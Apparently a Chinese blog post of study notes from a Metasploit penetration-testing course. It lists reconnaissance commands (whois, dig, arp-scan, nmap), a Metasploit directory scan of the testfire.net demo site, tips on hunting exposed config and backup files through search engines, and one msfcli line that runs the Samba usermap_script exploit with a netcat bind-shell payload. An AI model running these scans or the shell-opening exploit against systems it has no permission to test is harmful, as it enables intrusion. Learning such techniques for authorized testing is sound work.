Metasloit渗透测试魔鬼训练营
2024-08-31 08:51:43
总结一句话 漏洞 攻击 拿权限 维持访问
课程目标
掌握黑客渗透攻击流程
掌握常用攻击软件 渗透测试工程师
掌握常见windows漏洞挖掘和攻击
掌握常见linux漏洞挖掘和攻击
参考书籍
《Metasploit渗透测试指南》肯尼(行业经典) 最详细
《Metasloit渗透测试魔鬼训练营》 诸葛建伟(国内经典) 靠谱、拓扑图
《网络攻防技术与实践》诸葛建伟(清华大学网络安全课) 基础入门
《黑客大曝光》--经典,编程****************************************
讲义目录
常用命令
startx 进入图形界面
进入unity模式
whois pinginglab.com
有相关信息
nsloopup set type=A /填写特定的域名/ dns
dig 为准
arpping arp-scan --interface=eth2 10.10.10.0/24
网段扫描 nbtscan 172.17.21.0/24
主机扫描 nmap 172.17.21.96 -a 可带参数
meta环境 msfconsole
msf > use auxiliary/scanner/discovery/arp_sweep
************************************************
wifi密码破解
************************************************
msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=10.10.10.254 E
********************************************************************************************************************************************************
工具介绍
环境搭建 (连通性测试)
testfire.net
msf>whois testfire.com 查询域名信息
root@bt:~# nsloopup
>set type=A ;;设置对其ip地址进行解析 MX查找其邮件转发
>testfire.net ;;域名或ip
...........................
>exit
root@bt:~# dig @ns.watson.ibm.com testfire.net ;;
............................
使用Google hacking技术搜索网站目录
扩展名inc:可能包含网站配置信息,如数据库用户名/口令
扩展名bak:通常是一些文本编辑器源代码留下的备份文件,程序脚本文件大致内容
扩展名tex或sql:sql脚本,数据库结构等信息
使用dir_scanner辅助模块来搜索网站目录(testfire.net)
msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > set THREADS 100
THREADS => 100
msf auxiliary(dir_scanner) > set RHOSTS www.testfire.net
RHOSTS => www.testfire.net
msf auxiliary(dir_scanner) > exploit
msf auxiliary(dir_scanner) > set THREADS 100
THREADS => 100
msf auxiliary(dir_scanner) > set RHOSTS www.testfire.net
RHOSTS => www.testfire.net
msf auxiliary(dir_scanner) > exploit
...........................................;;发现一个Admin隐藏目录,返回HTTP 403
端口扫描
arp_sweep 扫描
msf >use auxiliary/scanner/discovery/arp_sweep
namp 扫描
直接 namp -A ip
msf>namp -PU -sn ip
操作系统辨别
msf >nmap -O ip
最新文章
- SSH(Struts2+Spring+Hibernate)框架搭建流程
- zw版【转发·台湾nvp系列Delphi例程】HALCON OverpaintRegion2
- C# winform打印总结 z
- POJ1338Ugly Numbers(DP)
- python文件处理
- 查看db2表空间使用率
- SVN中正确的add操作和delete操作
- 我的Android 4 学习系列之创建用户基本界面
- 文件断点续传原理与实现—— ESFramework 通信框架4.0 进阶(12)
- SELECT TOP 1 * FROM是什么意思
- React Native 系列(七) -- ListView
- pgsql sql 统计整理
- Uni-app中Class绑定与Style绑定
- Android Studio 获取数字签名
- vue router.push(),router.replace(),router.go()和router.replace后需要返回两次的问题
- VS从数据库表生成Model代码
- spring源码分析系列 (1) spring拓展接口BeanFactoryPostProcessor、BeanDefinitionRegistryPostProcessor
- 尚学堂java 答案解析 第五章
- 开源自然语言处理工具包hanlp中CRF分词实现详解
- 树莓派系统(Debain)中设置SSH服务开机自启动
热门文章
- 单源最短路径 Bellman_ford 和 dijkstra
- FastDFS+nginx+php的完整应用[转储]
- JAVA_构造方法
- google --SwitchyOmega and switchysharp ***
- 2016.3.15__H5页面实战__第七天
- linux 下shell脚本执行多个命令的方法
- [React] {svg, css module, sass} support in Create React App 2.0
- jquery获取input值的各种情况
- HTML5裁剪图片并上传至服务器实现原理讲解
- MySQL 存储过程传參之in, out, inout 參数使用方法